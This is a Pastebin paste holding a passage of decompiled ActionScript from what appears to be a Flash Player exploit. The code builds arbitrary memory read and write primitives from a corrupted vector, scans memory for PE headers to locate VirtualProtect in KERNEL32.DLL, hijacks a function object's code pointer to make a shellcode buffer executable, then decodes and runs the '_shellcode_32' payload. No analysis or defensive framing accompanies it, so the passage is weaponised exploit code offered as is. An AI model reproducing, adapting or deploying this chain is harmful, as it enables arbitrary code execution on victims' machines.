  46.          _mc = param3;
  47.          _mcOffs = param4;
  48.          return true;
  49.       }
  50.      
  51.       static function CleanUp() : *
  52.       {
  53.          Set(_vAddr - 8,_vLen);
  54.       }
  55.      
  56.       static function Get(param1:uint) : uint
  57.       {
  58.          if(param1 < 65536)
  59.          {
  60.             throw new Error("Get() at addr = " + Hex(param1));
  61.          }
  62.          return _v[param1 - _vAddr >>> 2];
  63.       }
  64.      
  65.       static function Set(param1:uint, param2:uint) : *
  66.       {
  67.          if(param1 < 65536)
  68.          {
  69.             throw new Error("");
  70.          }
  71.          _v[param1 - _vAddr >>> 2] = param2;
  72.       }
  73.      
  74.       static function GetAddr(param1:Object) : uint
  75.       {
  76.          _mc.o1 = param1;
  77.          return _v[_mcOffs] - 1;
  78.       }
  79.      
  80.       static function FindVP() : uint
  81.       {
  82.          var _loc1_:uint = 0;
  83.          var _loc2_:uint = 0;
  84.          var _loc3_:uint = 0;
  85.          var _loc4_:uint = 0;
  86.          var _loc5_:Vector.<uint> = null;
  87.          var _loc6_:uint = 0;
  88.          var _loc7_:uint = 0;
  89.          var _loc8_:uint = 0;
  90.          var _loc9_:uint = 0;
  91.          try
  92.          {
  93.             _loc2_ = _v[_mcOffs - 3];
  94.             _loc2_ = uint(_loc2_ & 4.29490176E9) - 4194304 - _vAddr;
  95.             while(_loc3_ < 160)
  96.             {
  97.                _loc1_ = _loc2_ >>> 2;
  98.                if(uint(_v[_loc1_] & 65535) == 23117)
  99.                {
  100.                   break;
  101.                }
  102.                _loc3_++;
  103.                _loc2_ = _loc2_ - 65536;
  104.             }
  105.             if(_loc3_ >= 160)
  106.             {
  107.                throw new Error("");
  108.             }
  109.             _loc1_ = _loc1_ + 15;
  110.             _loc1_ = _loc2_ + _v[_loc1_] >>> 2;
  111.             if(_v[_loc1_] != 17744)
  112.             {
  113.                throw new Error("");
  114.             }
  115.             _loc1_ = _loc1_ + 33;
  116.             _loc4_ = _v[_loc1_] >>> 2;
  117.             _loc1_ = uint(_loc2_ + _v[--_loc1_]) >>> 2;
  118.             _loc5_ = new Vector.<uint>(4);
  119.             _loc1_ = _loc1_ + 3;
  120.             _loc3_ = 3;
  121.             while(_loc3_ < _loc4_)
  122.             {
  123.                _loc8_ = _loc2_ + _v[_loc1_] >>> 2;
  124.                _loc9_ = 0;
  125.                while(_loc9_ < 4)
  126.                {
  127.                   _loc5_[_loc9_] = _v[_loc8_];
  128.                   _loc9_++;
  129.                   _loc8_++;
  130.                }
  131.                if(MyUtils.IsEqual(_loc5_,"KERNEL32.DLL"))
  132.                {
  133.                   _loc6_ = _v[_loc1_ - 3];
  134.                   _loc7_ = _v[_loc1_ + 1];
  135.                   break;
  136.                }
  137.                _loc3_ = _loc3_ + 5;
  138.                _loc1_ = _loc1_ + 5;
  139.             }
  140.             if(_loc6_ == 0 || _loc7_ == 0)
  141.             {
  142.                throw new Error("");
  143.             }
  144.             _loc1_ = uint(_loc2_ + _loc6_) >>> 2;
  145.             _loc5_.length = 5;
  146.             _loc3_ = 0;
  147.             while(_loc3_ < 256)
  148.             {
  149.                _loc8_ = _v[_loc1_];
  150.                if(_loc8_ == 0)
  151.                {
  152.                   throw new Error("");
  153.                }
  154.                _loc8_ = _loc2_ + _loc8_ >>> 2;
  155.                _loc9_ = 0;
  156.                while(_loc9_ < 5)
  157.                {
  158.                   _loc5_[_loc9_] = _v[_loc8_];
  159.                   _loc9_++;
  160.                   _loc8_++;
  161.                }
  162.                if(MyUtils.IsEqual(_loc5_,"VIRTUALPROTECT",2) && MyUtils._bArr.readByte() == 0)
  163.                {
  164.                   _loc8_ = uint(_loc2_ + _loc7_ + _loc3_ * 4) >>> 2;
  165.                   return _v[_loc8_];
  166.                }
  167.                _loc3_++;
  168.                _loc1_++;
  169.             }
  170.          }
  171.          catch(e:Error)
  172.          {
  173.          }
  174.          return 0;
  175.       }
  176.      
  177.       static function Payload(... rest) : *
  178.       {
  179.       }
  180.      
  181.       static function CallVP(param1:uint, param2:uint, param3:uint) : *
  182.       {
  183.          var _loc9_:uint = 0;
  184.          Payload();
  185.          var _loc4_:uint = GetAddr(Payload);
  186.          var _loc5_:uint = Get(Get(Get(Get(_loc4_ + 8) + 20) + 4) + (_isDbg?188:176));
  187.          var _loc6_:uint = Get(_loc5_);
  188.          var _loc7_:uint = Get(_loc4_ + 28);
  189.          var _loc8_:uint = Get(_loc4_ + 32);
  190.          while(_loc9_ < 256)
  191.          {
  192.             _v[_loc9_] = Get(_loc6_ - 128 + _loc9_ * 4);
  193.             _loc9_++;
  194.          }
  195.          _v[32 + 7] = param1;
  196.          Set(_loc4_ + 28,param2);
  197.          Set(_loc4_ + 32,param3);
  198.          var _loc10_:Array = new Array(65);
  199.          Set(_loc5_,_vAddr + 128);
  200.          var _loc11_:* = Payload.call.apply(null,_loc10_);
  201.          Set(_loc5_,_loc6_);
  202.          Set(_loc4_ + 28,_loc7_);
  203.          Set(_loc4_ + 32,_loc8_);
  204.       }
  205.      
  206.       static function Exec() : *
  207.       {
  208.          var _loc1_:uint = 0;
  209.          var _loc2_:* = undefined;
  210.          var _loc3_:* = undefined;
  211.          var _loc4_:* = undefined;
  212.          var _loc5_:* = undefined;
  213.          var _loc6_:* = undefined;
  214.          var _loc7_:uint = 0;
  215.          var _loc8_:uint = 0;
  216.          var _loc9_:uint = 0;
  217.          var _loc10_:uint = 0;
  218.          var _loc11_:* = undefined;
  219.          try
  220.          {
  221.             _loc1_ = 0;
  222.             _loc2_ = null;
  223.             _loc3_ = null;
  224.             _loc4_ = null;
  225.             _loc5_ = null;
  226.             _loc6_ = null;
  227.             while(_loc1_ < _shellcode_32.length)
  228.             {
  229.                _loc5_ = _shellcode_32.charAt(_loc1_ + 6) + _shellcode_32.charAt(_loc1_ + 7);
  230.                _loc4_ = _shellcode_32.charAt(_loc1_ + 4) + _shellcode_32.charAt(_loc1_ + 5);
  231.                _loc3_ = _shellcode_32.charAt(_loc1_ + 2) + _shellcode_32.charAt(_loc1_ + 3);
  232.                _loc2_ = _shellcode_32.charAt(_loc1_) + _shellcode_32.charAt(_loc1_ + 1);
  233.                _loc6_ = _loc5_ + _loc4_ + _loc3_ + _loc2_;
  234.                _x32.push(parseInt(_loc6_,16));
  235.                _loc1_ = _loc1_ + 8;
  236.             }
  237.             _loc7_ = GetAddr(_x32);
  238.             _loc7_ = _loc7_ + (_isDbg?28:24);
  239.             if(Get(_loc7_) < 65536)
  240.             {
  241.                _loc7_ = _loc7_ - 4;
  242.             }
  243.             _loc7_ = Get(_loc7_) + 8;
  244.             _loc8_ = FindVP();
  245.             if(_loc8_ == 0)
  246.             {
  247.                throw new Error("");
  248.             }
  249.             CallVP(_loc8_,_loc7_,_x32.length * 4);
  250.             _loc9_ = GetAddr(Payload);
  251.             _loc9_ = Get(Get(_loc9_ + 28) + 8) + 4;
  252.             _loc10_ = Get(_loc9_);
  253.             Set(_loc9_,_loc7_);
  254.             _loc11_ = Payload.call(null);
  255.             Set(_loc9_,_loc10_);
  256.          }
  257.          catch(e:Error)
  258.          {
  259.          }
  260.          CleanUp();
  261.       }
  262.    }
  263. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!